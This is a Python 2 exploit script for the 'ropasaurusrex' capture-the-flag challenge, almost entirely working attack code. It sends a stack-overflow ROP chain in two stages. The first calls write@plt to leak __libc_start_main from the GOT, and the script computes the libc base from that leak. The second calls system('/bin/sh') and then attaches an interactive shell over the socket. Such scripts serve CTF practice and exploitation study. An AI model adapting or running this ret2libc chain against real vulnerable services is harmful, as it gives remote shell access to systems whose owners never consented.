ropasaurusrex
#!/usr/bin/env python2
import binascii
import re
import socket
import struct
import subprocess
import sys
import telnetlib
import time
def create_socket(rhp=('127.0.0.1', 1025)):
    """Connect to the target and return ``(socket, file)``.

    ``rhp`` is a ``(host, port)`` pair; the default points at a local
    instance of the challenge service.  The file object is opened
    unbuffered (``bufsize=0``, Python 2 ``makefile`` signature) so that
    each ``write`` goes straight to the wire instead of sitting in a
    userspace buffer.
    """
    conn = socket.create_connection(rhp)
    stream = conn.makefile('rw', bufsize=0)
    return conn, stream
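def read_until(f, delim='\n'):
    """Read ``f`` one byte at a time until the data read ends with ``delim``.

    Returns everything read, including the delimiter.  Raises ``EOFError``
    if the stream closes before ``delim`` is seen: a closed stream makes
    ``read(1)`` return ``''`` forever, which would otherwise spin this loop
    without end (the previous version had no EOF check).
    """
    data = ''
    while not data.endswith(delim):
        chunk = f.read(1)
        if not chunk:
            raise EOFError('stream closed before delimiter %r (got %r)' % (delim, data))
        data += chunk
    return data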
def interactive(s):
    """Hand the connected socket ``s`` over to an interactive session.

    A ``Telnet`` object is created without connecting and its ``sock`` is
    swapped for the socket we already hold, so ``interact()`` simply relays
    stdin/stdout to whatever is on the other end (the spawned shell).
    """
    session = telnetlib.Telnet()
    session.sock = s
    print("[+] got shell")
    session.interact()
def p(x, t='<I'):
    """Pack the integer ``x`` with ``struct`` format ``t``.

    The default ``'<I'`` is a little-endian unsigned 32-bit value, the
    native word size for this x86 target.
    """
    packer = struct.Struct(t)
    return packer.pack(x)
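def u(x, t='<I', i=0):
    """Unpack ``x`` with ``struct`` format ``t``.

    By default returns field ``i`` (the first) of the unpacked tuple; pass
    ``i=None`` to get the whole tuple, which is what you want for
    multi-field formats.  Raises ``struct.error`` when ``len(x)`` does not
    match the size of ``t``.
    """
    fields = struct.unpack(t, x)
    # ``is not None`` is the idiomatic spelling of the original ``not i is None``.
    if i is None:
        return fields
    return fields[i]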
# constant values.
STDOUT_FILENO = 1
EXIT_SUCCESS = 0
dummy_address = 0xdeadbeef  # filler for stack slots whose value is never used (padding, exit()'s return address).
# gadgets.
# NOTE: the addresses below are used as absolute addresses, so the target binary is
# assumed to be loaded at a fixed address (no PIE); they only change if the binary does.
pret = 0x80484b8 #: pop ebp ; ret ;  -- cleans one argument off the stack after a call.
p3ret = 0x80484b6 #: pop esi ; pop edi ; pop ebp ; ret ;  -- cleans three arguments (write()'s).
sub_80483f4 = 0x80483f4  # function re-entered after the leak so the target reads stage 2 (presumably the one with the overflow).
got__libc_start_main = 0x8049618  # GOT slot whose contents are leaked to locate libc.
plt_write = 0x0804830c  # write@plt, called with attacker-chosen arguments to perform the leak.
# depends on the environment.
# NOTE: these are offsets from the libc load base and differ between libc builds;
# recompute them against the exact libc.so.6 the target runs (symbol offsets via
# `nm -D` / `readelf -s`, the string via the objdump command below), or the
# computed addresses will be wrong and stage 2 will only crash the target.
offset_libc__libc__start_main = 0x00018570
offset_libc__libc_system = 0x0003ad70
offset_libc__exit = 0x000b30e4
offset_libc_bin_sh = 0x15e3a8 # objdump -sj .rodata ../../libc.so.6|grep "/bin/sh"
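# --- connect to remote (localhost by default) ---
s, f = create_socket()

# Distance from the start of the overflowed buffer to the saved return address:
# 0x88 bytes of buffer plus the 4-byte saved ebp (this is the layout stage 1
# already relies on).  The frame layout is fixed by the function prologue, so
# the same padding applies when the function is re-entered for stage 2; the
# previous stage-2 chain used one extra dword here, which disagreed with stage 1.
ret_offset = 0x88 + 4
padding = p(dummy_address) * (ret_offset // 4)

# --- stage 1: leak the runtime address of __libc_start_main. ---
payload = "".join((
    padding,                    # fill the buffer and the saved ebp.
    # write(STDOUT_FILENO, got__libc_start_main, 4); // leaks the resolved libc address.
    p(plt_write),               # return address -> write@plt.
    p(p3ret),                   # write() returns here: pop its 3 args, then ret.
    p(STDOUT_FILENO),           # 1st arg.
    p(got__libc_start_main),    # 2nd arg: GOT slot to read.
    p(4),                       # 3rd arg: sizeof(void *) on x86.
    p(sub_80483f4),             # re-enter the function so the target reads stage 2.
))
f.write(payload)
time.sleep(1)  # kept from the original ("disconnect read() stream"); presumably keeps the two stages from being read as one.
leak = f.read(4)
if len(leak) != 4:
    # Short read means the ROP chain did not run (wrong offsets/gadgets or the target died).
    sys.exit("[-] leak failed: expected 4 bytes, got %r" % (leak,))
leaked__libc_start_main = u(leak)

# --- calculate the libc base address. ---
libc_base = leaked__libc_start_main - offset_libc__libc__start_main
print("[+] libc base: 0x{:x}".format(libc_base))
# libc is mapped at a page boundary; a misaligned base means the offset_libc_*
# values do not belong to the target's libc and stage 2 would only crash it.
if libc_base & 0xfff:
    sys.exit("[-] libc base 0x{:x} is not page-aligned; check offset_libc_* against the target's libc.so.6".format(libc_base))
libc_system = libc_base + offset_libc__libc_system
libc_exit = libc_base + offset_libc__exit
libc_bin_sh = libc_base + offset_libc_bin_sh

# --- stage 2: system("/bin/sh"); exit(EXIT_SUCCESS); ---
payload = "".join((
    padding,                    # same buffer + saved-ebp fill as stage 1.
    p(libc_system),             # return address -> system().
    p(pret),                    # system() returns here: pop its argument, ret into exit().
    p(libc_bin_sh),             # system()'s 1st arg: "/bin/sh" inside libc.
    p(libc_exit),               # exit(EXIT_SUCCESS) so the target does not crash after the shell.
    p(dummy_address),           # exit()'s return address; never used.
    p(EXIT_SUCCESS),            # exit()'s 1st arg.
))
f.write(payload)
time.sleep(1)  # as above: let the target consume stage 2 before we attach.

# --- hand the connection to the user. ---
interactive(s)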